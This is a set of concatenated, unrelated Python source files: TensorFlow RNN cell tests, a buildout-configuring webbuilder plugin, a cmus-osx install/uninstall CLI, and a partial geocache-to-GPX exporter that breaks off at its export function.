g, _ = tf.nn.rnn_cell.GRUCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
# Smoke test
self.assertAllClose(res[0], [[0.156736, 0.156736]])
def testBasicLSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 8])
g, out_m = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2)] * 2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m], {x.name: np.array([[1., 1.]]),
m.name: 0.1 * np.ones([1, 8])})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.24024698, 0.24024698]])
expected_mem = np.array([[0.68967271, 0.68967271,
0.44848421, 0.44848421,
0.39897051, 0.39897051,
0.24024698, 0.24024698]])
self.assertAllClose(res[1], expected_mem)
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3]) # Test BasicLSTMCell with input_size != num_units.
m = tf.zeros([1, 4])
g, out_m = tf.nn.rnn_cell.BasicLSTMCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m], {x.name: np.array([[1., 1., 1.]]),
m.name: 0.1 * np.ones([1, 4])})
self.assertEqual(len(res), 2)
def testBasicLSTMCellStateTupleType(self):
with self.test_session():
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m0 = (tf.zeros([1, 2]),) * 2
m1 = (tf.zeros([1, 2]),) * 2
cell = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2, state_is_tuple=True)] * 2,
state_is_tuple=True)
self.assertTrue(isinstance(cell.state_size, tuple))
self.assertTrue(isinstance(cell.state_size[0],
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(cell.state_size[1],
tf.nn.rnn_cell.LSTMStateTuple))
# Pass in regular tuples
_, (out_m0, out_m1) = cell(x, (m0, m1))
self.assertTrue(isinstance(out_m0,
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(out_m1,
tf.nn.rnn_cell.LSTMStateTuple))
# Pass in LSTMStateTuples
tf.get_variable_scope().reuse_variables()
zero_state = cell.zero_state(1, tf.float32)
self.assertTrue(isinstance(zero_state, tuple))
self.assertTrue(isinstance(zero_state[0],
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(zero_state[1],
tf.nn.rnn_cell.LSTMStateTuple))
_, (out_m0, out_m1) = cell(x, zero_state)
self.assertTrue(
isinstance(out_m0, tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(
isinstance(out_m1, tf.nn.rnn_cell.LSTMStateTuple))
def testBasicLSTMCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m0 = tf.zeros([1, 4])
m1 = tf.zeros([1, 4])
cell = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2)] * 2, state_is_tuple=True)
g, (out_m0, out_m1) = cell(x, (m0, m1))
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m0, out_m1],
{x.name: np.array([[1., 1.]]),
m0.name: 0.1 * np.ones([1, 4]),
m1.name: 0.1 * np.ones([1, 4])})
self.assertEqual(len(res), 3)
# The numbers in results were not calculated, this is just a smoke test.
# Note, however, these values should match the original
# version having state_is_tuple=False.
self.assertAllClose(res[0], [[0.24024698, 0.24024698]])
expected_mem0 = np.array([[0.68967271, 0.68967271,
0.44848421, 0.44848421]])
expected_mem1 = np.array([[0.39897051, 0.39897051,
0.24024698, 0.24024698]])
self.assertAllClose(res[1], expected_mem0)
self.assertAllClose(res[2], expected_mem1)
def testLSTMCell(self):
with self.test_session() as sess:
num_units = 8
num_proj = 6
state_size = num_units + num_proj
batch_size = 3
input_size = 2
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size])
cell = tf.nn.rnn_cell.LSTMCell(
num_units=num_units, num_proj=num_proj, forget_bias=1.0)
output, state = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1.], [2., 2.], [3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size))})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_proj))
self.assertEqual(res[1].shape, (batch_size, state_size))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((res[1][0, :] - res[1][i, :]))) > 1e-6)
def testOutputProjectionWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 3])
cell = tf.nn.rnn_cell.OutputProjectionWrapper(
tf.nn.rnn_cell.GRUCell(3), 2)
g, new_m = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.231907, 0.231907]])
def testInputProjectionWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 3])
cell = tf.nn.rnn_cell.InputProjectionWrapper(
tf.nn.rnn_cell.GRUCell(3), num_proj=3)
g, new_m = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.154605, 0.154605, 0.154605]])
def testDropoutWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 3])
keep = tf.zeros([]) + 1
g, new_m = tf.nn.rnn_cell.DropoutWrapper(tf.nn.rnn_cell.GRUCell(3),
keep, keep)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.154605, 0.154605, 0.154605]])
def testEmbeddingWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 1], dtype=tf.int32)
m = tf.zeros([1, 2])
embedding_cell = tf.nn.rnn_cell.EmbeddingWrapper(
tf.nn.rnn_cell.GRUCell(2),
embedding_classes=3, embedding_size=2)
self.assertEqual(embedding_cell.output_size, 2)
g, new_m = embedding_cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 2))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.17139, 0.17139]])
def testEmbeddingWrapperWithDynamicRnn(self):
with self.test_session() as sess:
with tf.variable_scope("root"):
inputs = tf.convert_to_tensor([[[0], [0]]], dtype=tf.int64)
input_lengths = tf.convert_to_tensor([2], dtype=tf.int64)
embedding_cell = tf.nn.rnn_cell.EmbeddingWrapper(
tf.nn.rnn_cell.BasicLSTMCell(1, state_is_tuple=True),
embedding_classes=1,
embedding_size=2)
outputs, _ = tf.nn.dynamic_rnn(cell=embedding_cell,
inputs=inputs,
sequence_length=input_lengths,
dtype=tf.float32)
sess.run([tf.initialize_all_variables()])
# This will fail if output's dtype is inferred from input's.
sess.run(outputs)
def testMultiRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 4])
_, ml = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run(ml, {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1, 0.1]])})
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res, [[0.175991, 0.175991,
0.13248, 0.13248]])
def testMultiRNNCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m_bad = tf.zeros([1, 4])
m_good = (tf.zeros([1, 2]), tf.zeros([1, 2]))
# Test incorrectness of state
with self.assertRaisesRegexp(ValueError, "Expected state .* a tuple"):
tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2, state_is_tuple=True)(x, m_bad)
_, ml = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2, state_is_tuple=True)(x, m_good)
sess.run([tf.initialize_all_variables()])
res = sess.run(ml, {x.name: np.array([[1., 1.]]),
m_good[0].name: np.array([[0.1, 0.1]]),
m_good[1].name: np.array([[0.1, 0.1]])})
# The numbers in results were not calculated, this is just a
# smoke test. However, these numbers should match those of
# the test testMultiRNNCell.
self.assertAllClose(res[0], [[0.175991, 0.175991]])
self.assertAllClose(res[1], [[0.13248, 0.13248]])
class SlimRNNCellTest(tf.test.TestCase):
def testBasicRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
my_cell = functools.partial(basic_rnn_cell, num_units=2)
# pylint: disable=protected-access
g, _ = tf.nn.rnn_cell._SlimRNNCell(my_cell)(x, m)
# pylint: enable=protected-access
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[0].shape, (1, 2))
def testBasicRNNCellMatch(self):
batch_size = 32
input_size = 100
num_units = 10
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
inputs = tf.random_uniform((batch_size, input_size))
_, initial_state = basic_rnn_cell(inputs, None, num_units)
my_cell = functools.partial(basic_rnn_cell, num_units=num_units)
# pylint: disable=protected-access
slim_cell = tf.nn.rnn_cell._SlimRNNCell(my_cell)
# pylint: enable=protected-access
slim_outputs, slim_state = slim_cell(inputs, initial_state)
rnn_cell = tf.nn.rnn_cell.BasicRNNCell(num_units)
outputs, state = rnn_cell(inputs, initial_state)
self.assertEqual(slim_outputs.get_shape(), outputs.get_shape())
self.assertEqual(slim_state.get_shape(), state.get_shape())
sess.run([tf.initialize_all_variables()])
res = sess.run([slim_outputs, slim_state, outputs, state])
self.assertAllClose(res[0], res[2])
self.assertAllClose(res[1], res[3])
def basic_rnn_cell(inputs, state, num_units, scope=None):
if state is None:
if inputs is not None:
batch_size = inputs.get_shape()[0]
dtype = inputs.dtype
else:
batch_size = 0
dtype = tf.float32
init_output = tf.zeros(tf.pack([batch_size, num_units]), dtype=dtype)
init_state = tf.zeros(tf.pack([batch_size, num_units]), dtype=dtype)
init_output.set_shape([batch_size, num_units])
init_state.set_shape([batch_size, num_units])
return init_output, init_state
else:
with tf.variable_op_scope([inputs, state], scope, "BasicRNNCell"):
output = tf.tanh(linear([inputs, state],
num_units, True))
return output, output
if __name__ == "__main__":
tf.test.main()
|
|
#!/usr/bin/env python
# Copyright (C) 2009, Mathieu PASQUET <mpa@makina-corpus.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__docformat__ = 'restructuredtext en'
import os
import re
re_flags = re.M | re.U | re.I | re.S
from zope.interface import implements
from collective.generic.webbuilder import interfaces
from iniparse import INIConfig
from collective.generic.webbuilder.utils import remove_path
class DummyPlugin(object):
implements(interfaces.IPostGenerationPlugin)
def __init__(self, paster):
self.paster = paster
def process(self, output_dir):
print "I am a dummy plugin doing nothing inside %s for %s" % (
output_dir,
self.paster.configuration.name
)
def remove_egg_info(p):
for dirpath, dirnames, filenames in os.walk(p):
for filename in dirnames + filenames:
if 'egg-info' in filename:
remove_path(
os.path.join(dirpath, filename)
)
for directory in dirnames:
subdir = os.path.join(dirpath, directory)
remove_egg_info(subdir)
class EggInfoPlugin(DummyPlugin):
def process(self, output_dir, project_name, params):
remove_egg_info(output_dir)
class EggPlugin(DummyPlugin):
def process(self, output_dir, project_name, params):
"""."""
eggsnames = []
devnames = []
src_dir = os.path.join(output_dir, 'src')
for path in os.listdir(src_dir):
p = os.path.join(src_dir, path)
if os.path.isdir(p):
if os.path.exists(os.path.join(p, 'setup.py')):
eggsnames.append(path)
devnames.append(os.path.join('src', path))
zcmlnames = [n
for n in eggsnames
if (
('policy' in n)
or (n == project_name)
or (n == '%s.core' % project_name)
)]
f = os.path.join(output_dir, 'buildout.cfg')
sf = os.path.join(
output_dir, 'etc', 'project', 'sources.cfg')
pf = os.path.join(
output_dir, 'etc', 'project', '%s.cfg' % project_name)
if os.path.exists(pf):
f = pf
else:
for i in ['django', 'plone', 'pyramid']:
pf = os.path.join(
output_dir, 'etc', 'project', '%s.cfg' % i)
if os.path.exists(pf):
f = pf
cfg = INIConfig(open(f))
srccfg = None
if os.path.exists(sf):
srccfg = INIConfig(open(sf))
else:
srccfg = cfg
extdevoption_re = re.compile('develop\s*\+\s*', re_flags)
devoption_re = re.compile('develop\s*', re_flags)
autocheckout_option_re = re.compile(
'auto-checkout\s*', re_flags)
ext_autocheckout_option_re = re.compile(
'auto-checkout\s*\+\s*', re_flags)
exteggsoption_re = re.compile('eggs\s*\+\s*', re_flags)
eggsoption_re = re.compile('eggs\s*', re_flags)
eggsoption_re = re.compile('eggs\s*', re_flags)
devoption, eggsoption = 'develop+', 'eggs+'
devfound, eggsfound, acfound = False, False, False
for optionre in [ext_autocheckout_option_re,
autocheckout_option_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
acfound = True
autocheckout = option
break
for optionre in [extdevoption_re, devoption_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
devfound = True
devoption = option
break
for optionre in [exteggsoption_re, eggsoption_re, ]:
for option in cfg.buildout:
if optionre.match(option):
eggsfound = True
eggsoption = option
break
if eggsfound:
for eggn in eggsnames:
if not (eggn in cfg.buildout[eggsoption]):
cfg.buildout[eggsoption] = '\n '.join(
[a for a in eggn,
cfg.buildout[eggsoption].strip()
if a.strip()])
else:
cfg.buildout[eggsoption] = ''
for eggn in eggsnames:
cfg.buildout[eggsoption] = '\n '.join(
[a for a in
eggn,
cfg.buildout[eggsoption].strip()
if a.strip()])
if srccfg:
if acfound:
for eggn in eggsnames:
if 'sources-dir' in cfg.buildout:
del cfg.buildout['sources-dir']
if not (eggn in cfg.buildout[autocheckout]):
cfg.buildout[autocheckout] = '\n '.join(
[a for a in
eggn,
cfg.buildout[autocheckout].strip()
if a.strip()])
if not (eggn in cfg.sources):
cfg.sources[eggn] = 'fs %s' % (eggn,)
cfg.sources._lines[0].contents.insert(
1, cfg.sources._lines[0].contents.pop(-1))
else:
if devfound:
for eggn in devnames:
if not (eggn in cfg.buildout[devoption]):
cfg.buildout[devoption] = '\n '.join(
[a for a in
eggn,
cfg.buildout[devoption].strip()
if a.strip()])
else:
cfg.buildout[devoption] = ''
for eggn in devnames:
cfg.buildout[devoption] = '\n '.join(
[a for a in eggn,
cfg.buildout[devoption].strip()
if a.strip()])
# zcml are now handled via collective.generic.skel
extzcmloption_re = re.compile('zcml\s*\+\s*', re_flags)
zcmloption_re = re.compile('zcml\s*', re_flags)
zcmlfound = False
for optionre in [extzcmloption_re, zcmloption_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
zcmlfound = True
zcmloption = option
break
if zcmlfound:
for eggn in zcmlnames:
if 'buildout' in cfg:
if not (eggn in cfg.buildout[zcmloption]):
if (
('policy' in eggn)
or ('tma' in eggn)
or ('.core' in eggn)
or (project_name == eggn)
):
cfg.buildout[zcmloption] = '\n '.join([
a for a in
cfg.buildout[zcmloption].strip(),
eggn if a.strip()])
else:
for eggn in zcmlnames:
if 'instance' in cfg:
if 'policy' in eggn:
oldzcml = ''
if 'zcml' in cfg.buildout:
oldzcml = cfg.buildout['zcml'].strip()
cfg.buildout['zcml'] = '\n ' % (
[a for a in eggn, oldzcml
if a.strip()])
f = open(f, 'w')
cfg = '%s' % cfg
cfg = cfg.replace('+ =', ' +=')
f.write(cfg)
f.close()
# plugin.process('/tmp/tmpRKqUZh')
# print open ( '%s/buildout.cfg' %'/tmp/tmpRKqUZh' ).read()
# vim:set et sts=4 ts=4 tw=80:
|
|
from dataclasses import dataclass
from os import chmod
from os import kill
from os import remove
from os import rename
from pathlib import Path
from shutil import rmtree
from signal import SIGTERM
from subprocess import call
from tempfile import NamedTemporaryFile
from typing import Optional
import click
from click import echo
from click import style
from .constants import AUTOSAVE_MISSING
from .constants import CMUS_OSX_FOLDER_NAME
from .constants import CONFIG_NAME
from .constants import COULD_NOT_LOCATED_CMUS_DIRECTORY
from .constants import ENV
from .constants import ENV_VAR_PREFIX
from .constants import RC_ENTRY_REGEX
from .constants import RC_SCRIPT_NAME
from .constants import SCRIPTS
from .constants import SDP_SCRIPT_NAME
from .constants import STATUS_DISPLAY_PROGRAM_REGEX
from .env import template
from .util import get_cmus_instances
from .util import locate_cmus_base_path
from .util import locate_editor
from .util import unexpanduser
class CmusConfig:
@dataclass
class _CmusConfig:
base_path: Path
# File that holds cmus commands that are executed on startup
rc_path: Path
# cmus config file
autosave_path: Path
def __new__(self) -> Optional["CmusConfig._CmusConfig"]: # type: ignore
base_path = locate_cmus_base_path()
if base_path is not None:
return CmusConfig._CmusConfig(
base_path, base_path / "rc", base_path / "autosave"
)
else:
return None
@click.group()
@click.pass_context
def entrypoint(ctx):
# Entrypoint is called directly
ctx.ensure_object(dict)
cmus_config = CmusConfig()
if cmus_config is not None:
cmus_osx_base_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME
cmus_osx_base_path.mkdir(exist_ok=True)
config_path = cmus_osx_base_path / CONFIG_NAME
if not config_path.is_file():
with open(config_path, "w") as f:
f.write(template(ENV_VAR_PREFIX, ENV))
if not cmus_config.rc_path.is_file():
cmus_config.rc_path.touch()
if not cmus_config.autosave_path.is_file():
echo(
f"{style('ERROR', fg='red')}: cmus config file missing (launch cmus at least once "
"before attempting installation)"
)
exit(AUTOSAVE_MISSING)
rc_script_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME / RC_SCRIPT_NAME
sdp_script_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME / SDP_SCRIPT_NAME
locals_ = locals()
for local in (local for local in locals_ if local != "ctx"):
ctx.obj[local] = locals_[local]
else:
echo(f"{style('ERROR', fg='red')}: Could not locate cmus config directory")
exit(COULD_NOT_LOCATED_CMUS_DIRECTORY)
@entrypoint.command()
@click.option("-f", "--force", is_flag=True)
@click.pass_context
def install(ctx, force):
cmus_config = ctx.obj["cmus_config"]
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
rc_script_path = ctx.obj["rc_script_path"]
sdp_script_path = ctx.obj["sdp_script_path"]
cmus_osx_base_path.mkdir(exist_ok=True)
for script_name in SCRIPTS:
script_path = cmus_osx_base_path / script_name
with open(script_path, "w") as f:
f.write(f"{SCRIPTS[script_name]}\n")
chmod(script_path, 0o744)
write_rc = True
unexpanded_rc_script_path = unexpanduser(rc_script_path)
tmp_rc_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.rc_path, "r") as f:
for line in f:
match = RC_ENTRY_REGEX.match(line)
# Found invocation of 'rc' script
if match is not None and Path(match.group(1)) in (
rc_script_path,
unexpanded_rc_script_path,
):
write_rc = False
tmp_rc_file.write(line)
if write_rc:
tmp_rc_file.write(f"shell {str(unexpanded_rc_script_path)} &\n")
rename(tmp_rc_file.name, cmus_config.rc_path)
else:
remove(tmp_rc_file.name)
write_autosave = False
unexpand_sdp_script_path = unexpanduser(sdp_script_path)
tmp_autosave_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.autosave_path, "r") as f:
for line in f:
match = STATUS_DISPLAY_PROGRAM_REGEX.match(line)
if match is not None:
sdp_value = match.group(1)
# 'status_display_program' is not set
if sdp_value == "":
# Write 'status_display_program' without asking for permission
write_autosave = True
elif Path(sdp_value) not in (sdp_script_path, unexpand_sdp_script_path):
# Ask for permission
if force or click.confirm(
f"{style('WARNING', fg='yellow')}: "
f"'status_display_program' currently set to '{sdp_value}', "
"override?"
):
write_autosave = True
else:
echo(
f"{style('WARNING', fg='yellow')}: Manually set "
"'status_display_program' to "
f"'{str(unexpand_sdp_script_path)}'"
)
if write_autosave:
tmp_autosave_file.write(
f"set status_display_program={str(unexpand_sdp_script_path)}\n"
)
else:
tmp_autosave_file.write(line)
# No need to replace 'autosave' if no changes were written
if write_autosave:
rename(tmp_autosave_file.name, cmus_config.autosave_path)
else:
remove(tmp_autosave_file.name)
if not write_rc and not write_autosave:
echo(f"{style('NOTE', fg='magenta')}: Already installed.")
else:
echo(f"{style('SUCCESS', fg='green')}: Successfully installed.")
@entrypoint.command()
@click.pass_context
def uninstall(ctx):
cmus_config = ctx.obj["cmus_config"]
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
rc_script_path = ctx.obj["rc_script_path"]
sdp_script_path = ctx.obj["sdp_script_path"]
try:
rmtree(cmus_osx_base_path)
except FileNotFoundError:
pass
cmus_instances = get_cmus_instances()
if cmus_instances is not None:
for pid in cmus_instances:
kill(pid, SIGTERM)
write_rc = False
tmp_rc_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.rc_path, "r") as f:
for line in f:
match = RC_ENTRY_REGEX.match(line)
# Exclude invocations of 'rc' script
if not (match is not None and Path(match.group(1)) == rc_script_path):
tmp_rc_file.write(line)
else:
write_rc = True
if write_rc:
rename(tmp_rc_file.name, cmus_config.rc_path)
else:
remove(tmp_rc_file.name)
write_autosave = False
tmp_autosave_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.autosave_path, "r") as f:
for line in f:
match = STATUS_DISPLAY_PROGRAM_REGEX.match(line)
# Exclude invocations of 'status_display_program' script
if not (match is not None and Path(match.group(1)) == sdp_script_path):
tmp_autosave_file.write(line)
else:
tmp_autosave_file.write("set status_display_program=\n")
write_autosave = True
# No need to replace 'autosave' if no changes were written
if write_autosave:
rename(tmp_autosave_file.name, cmus_config.autosave_path)
else:
remove(tmp_autosave_file.name)
if not write_rc and not write_autosave:
echo(f"{style('NOTE', fg='magenta')}: Already uninstalled.")
else:
echo(f"{style('SUCCESS', fg='green')}: Successfully uninstalled.")
@entrypoint.command()
@click.pass_context
def config(ctx):
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
config_path = cmus_osx_base_path / CONFIG_NAME
editor = locate_editor()
if editor is None:
echo(
f"{style('ERROR', fg='red')}: Could not locate editor, "
f"manually edit '{str(config_path)}'"
)
else:
call([str(editor), str(config_path)])
|
|
from lxml import etree
from app import geocache_db
from geocache_model_sql import Cache, Cacher, CacheType, CacheContainer, CacheCountry, CacheState, CacheToAttribute, Waypoint, WaypointSym, WaypointType, Log, LogType, Attribute, UserNote
from geocache import Geocache
from db import DbInterface
import re
import datetime
import time
import calendar
from dateutil.parser import parse
GPX_NS = "http://www.topografix.com/GPX/1/0"
GPX = "{%s}" % GPX_NS
GS_NS = "http://www.groundspeak.com/cache/1/0/1"
GS = "{%s}" % GS_NS
XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
XSI = "{%s}" % XSI_NS
latmin = 0
latmax = 0
lonmin = 0
lonmax = 0
deleted_wpt = {}
log_pool = {}
cacher_pool = None
def coords_to_string(coord, str1, str2):
string = str1
if coord < 0:
coord = -coord
string = str2
degrees = int(coord)
string += ' ' + str(degrees) + ' ' + '%.3f' % ((coord - degrees) * 60)
return string
def wpt_to_xml(parent, waypoint, geocache, data):
w_wpt = None
lat = waypoint['lat']
lon = waypoint['lon']
if waypoint['name'] == waypoint['gc_code']:
if geocache['coords_updated']:
lat = geocache['corr_lat']
lon = geocache['corr_lon']
data['latmin'] = min(data['latmin'], lat)
data['latmax'] = max(data['latmax'], lat)
data['lonmin'] = min(data['lonmin'], lon)
data['lonmax'] = max(data['lonmax'], lon)
w_wpt = subnode(parent, GPX+"wpt", attrib={'lat': str(lat), 'lon': str(lon)})
subnode(w_wpt, GPX+"time", text=waypoint['time'])
subnode(w_wpt, GPX+"name", text=waypoint['name'])
subnode(w_wpt, GPX+"cmt", text=waypoint['cmt'])
subnode(w_wpt, GPX+"desc", text=waypoint['descr'])
subnode(w_wpt, GPX+"url", text=waypoint['url'])
subnode(w_wpt, GPX+"urlname", text=waypoint['urlname'])
subnode(w_wpt, GPX+"sym", text=waypoint['sym'])
subnode(w_wpt, GPX+"type", text=waypoint['type'])
return w_wpt
def geocache_to_xml(parent, geocache, data):
wpt_node = None
print "DB01", geocache['waypoints']
for waypoint in geocache['waypoints']:
if waypoint['name'] == waypoint['gc_code']:
wpt_node = wpt_to_xml(parent, waypoint, geocache, data)
cache_node = subnode(wpt_node, GS+"cache", nsmap={'groundspeak':GS_NS},
attrib={
'id': str(geocache['id']),
'available': "True" if geocache['available'] else "False",
'archived': "True" if geocache['archived'] else "False"})
subnode(cache_node, GS+"name", text=geocache['name'])
subnode(cache_node, GS+"placed_by", text=geocache['placed_by'])
subnode(cache_node, GS+"owner", text=geocache['owner'], attrib={'id': str(geocache['owner_id'])})
subnode(cache_node, GS+"type", text=geocache['type'])
subnode(cache_node, GS+"container", text=geocache['container'])
if len(geocache['attributes']):
attr_node = subnode(cache_node, GS+"attributes")
for attribute in geocache['attributes']:
subnode(attr_node, GS+"attribute", text=attribute['name'],
attrib={
'id': str(attribute['gc_id']),
'inc': "1" if attribute['inc'] else "0"})
subnode(cache_node, GS+"difficulty", text=re.sub('\.0','', str(geocache['difficulty'])))
subnode(cache_node, GS+"terrain", text=re.sub('\.0','',str(geocache['terrain'])))
subnode(cache_node, GS+"country", text=geocache['country'])
subnode(cache_node, GS+"state", text=geocache['state'])
subnode(cache_node, GS+"short_description", text=geocache['short_desc'],
attrib={'html': "True" if geocache['short_html'] else "False"})
orig_coords_txt = ''
if geocache['coords_updated']:
orig_coords_txt = 'Original coordinates: ' + coords_to_string(geocache['lat'], 'N', 'S') + ' ' + coords_to_string(geocache['lon'], 'E', 'W')
if geocache['long_html']:
orig_coords_txt = '<p>' + orig_coords_txt + '</p>'
user_note = ''
if geocache['note_present']:
note = geocache_db.get_by_id(UserNote, geocache['id'])
user_note = note['note']
if geocache['long_html']:
user_note = '<div>' + user_note.replace("\n", "<br />") + '</div>'
subnode(cache_node, GS+"long_description", text=geocache['long_desc'] + orig_coords_txt + user_note,
attrib={'html': "True" if geocache['long_html'] else "False"})
subnode(cache_node, GS+"encoded_hints", text=geocache['encoded_hints'])
if len(geocache['logs']) and (data['max_logs'] > 0):
sort_logs = sorted(geocache['logs'], key=lambda log: log['date'])
logs_node = subnode(cache_node, GS+"logs")
for log in sort_logs[0:data['max_logs']]:
log_node = subnode(logs_node, GS+"log", attrib={'id': str(log['id'])})
subnode(log_node, GS+"date", text=log['date'])
subnode(log_node, GS+"type", text=log['type'])
subnode(log_node, GS+"finder", text=log['finder'], attrib={'id': str(log['finder_id'])})
subnode(log_node, GS+"text", text=log['text'], attrib={'encoded': 'True' if log['text_encoded'] else 'False'})
if data['waypoints']:
for waypoint in geocache['waypoints']:
if waypoint['name'] == waypoint['gc_code']:
wpt_to_xml(parent, waypoint, geocache, data)
def subnode(parent, tag_name, text=None, attrib=None, nsmap=None):
node = etree.SubElement(parent, tag_name, nsmap=nsmap)
if text is not None:
node.text = text
if attrib is not None:
for name, val in attrib.iteritems():
node.attrib[name] = val
return node
def export_gpx(data):
